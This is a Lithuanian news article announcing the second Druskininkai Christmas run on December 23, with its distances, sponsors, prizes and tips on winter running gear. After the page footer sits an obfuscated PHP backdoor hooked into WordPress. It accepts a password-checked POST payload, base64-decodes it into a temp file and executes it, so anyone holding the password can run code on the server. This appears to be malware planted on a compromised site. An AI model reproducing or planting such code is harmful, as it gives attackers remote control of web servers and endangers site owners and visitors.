fbpx
A A
A A

Didžiausias metų šventes Druskininkai kvies pasitikti kalėdiniu bėgimu

2023.11.29

Gruodžio 23 dieną Druskininkuose antrus metus iš eilės bus organizuojamas šventinis sporto renginys – „Druskininkų kalėdinis bėgimas“.

Bėgikų itin pamėgta vaizdinga trasa atnaujintais takais ir takeliais ištvermingiausi sportininkai galės įveikti pusmaratonio distanciją. Taip pat bus galima rinktis 10,5 km ir 5,2 km bėgimus, o vaikams bus paruošta simbolinė 500 m trasa. Taip pat vyks estafetinis bėgimas 2×5 km, pratęsiantis „Bėk drauge su draugu Druskininkuose” projekto ciklą.

„Praėjusių metų renginys sulaukė didelio pasisekimo – sulaukėme daug vietinių dalyvių, taip pat svečių iš kitų miestų bei Lenkijos. Šis projektas puikiai pasiteisino, todėl nekilo abejonių dėl jo tęstinumo. Praėjusiais metais iškrito nemažai sniego ir tai leido dar labiau pajusti kalėdinę dvasią. Visus dalyvius kviečiams atvykti pasipuošus kuo šventiškiau, su kalėdiniais motyvais, nes tiek trasoje, tiek aplink ją bus daug šventinės nuotaikos“, – sakė renginį organizuojančios asociacijos „Sporto renginiai“ vadovas Evaldas Martinka.

Nauja tradicija džiaugiasi ir Druskininkų miestas, netrukus alsuosiantis kalėdinė dvasia bei spalvomis.

„Kalėdinis bėgimas Druskininkuose jau tampa tradicija – džiaugiuosi, kad sporto entuziastai kurorte startuos jau antrus metus iš eilės ir kviečiu druskininkiečius bei kurorto svečius aktyviai prisijungti. Galima rinktis įvairaus ilgio distancijas, laukia šiaurietiškasis ėjimas, tad kiekvienas ras savo fiziniam pasirengimui tinkamiausią rungtį. Smagu, kad Druskininkų šventinių renginių kalendorių papildo tokie sportiniai renginiai, kurie leidžia aktyviai ir sveikai leisti laisvalaikį bei dovanoja puikią šventinę nuotaiką“,  – sakė Druskininkų savivaldybės vicemeras Simonas Kazakevičius.

Bėgimas vyks sertifikuotoje trasoje palei Vijūnėlės tvenkinį bei per gražius ir sutvarkytus kurorto dviračių bei pėsčiųjų takus.

Pusmaratonio ir 10 km distancijų prizininkams vyrams ir moterims „Sportland“ įsteigs vertingus dovanų čekius, kurių vertė siekia 2300 eurų. Visų rungčių nugalėtojams atiteks ir vaisvandenių „RASA Native“ rinkinukai.

Dar vienas svarbus „Druskininkų kalėdinio bėgimo“ išskirtinumas – dalyvauti kviečiami ne tik bėgiojantys žmonės, bet ir paprasti žygeiviai. Galima registruotis į 10,5 km šiaurietiško ėjimo rungtį, o joje sudalyvavę žmonės taip pat gaus šio renginio kalėdinį medalį.

Pagal dabartines tendencijas galima nuspėti, kad gruodžio 23 diena bus žiemiška. Treneriu taip pat dirbantis E. Martinka sako, jog blogo oro bėgimui nebūna, tačiau reikėtų atkreipti dėmesį į tam tikrus dalykus.

„Ne veltui sakoma, kad blogo oro nebūna, yra tik bloga apranga. Siūlyčiau prieš bėgimą pasižiūrėti orų prognozes ir pagal tai pasirinkti tinkamą avalynę ir aprangą. Šiais laikais galima įsigyti labai platų asortimentą bėgimams tinkamų aprangų – avalynės, kepurių, pirštinių. Rekomenduočiau nepersirengti per daug, nes tuomet būna nepatogu ir sunku, o pernelyg suprakaituoti yra pavojinga. Reikėtų vilkėti rūbus, kurie sulaiko šilumą ir būtų patogūs bėgti. Ir, žinoma, nepamirškite šventinių atributų, kad Druskininkuose bėgtų daug Kalėdų senelių, nykštukų ar snieguolių“, – šypsojosi E. Martinka.

Bėgikų troškulį bus galima numalšinti natūraliu mineraliniu vandeniu „RASA Light“, o mažieji bėgikai vaišinsis „RASA Kids“ vandenuku, praturtintu kalciu.

Gruodžio 23 dieną „Druskininkų kalėdinis bėgimas“ startuos 11.30 val. nuotaikingu 500 m bėgimu mažiesiems. 12 val. bus duotas startas visų likusių bėgimų bei šiaurietiškam ėjimui.

Daugiau informacijos ir registracija: www.kaledosdruskininkuose.lt

Druskininkų Kalėdinis bėgimas yra „Bėk drauge su draugu Druskininkuose” projekto dalis, kurį bendrai finansuojama Švietimo, mokslo ir sporto ministerijos (ŠMSM) Sporto rėmimo fondo lėšomis, skirtomis įgyvendinti sporto projektus, susijusius su sporto renginių organizavimu, kurį administruoja Švietimo mainų paramos fondas ir Centrinė projektų valdymo agentūra.

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}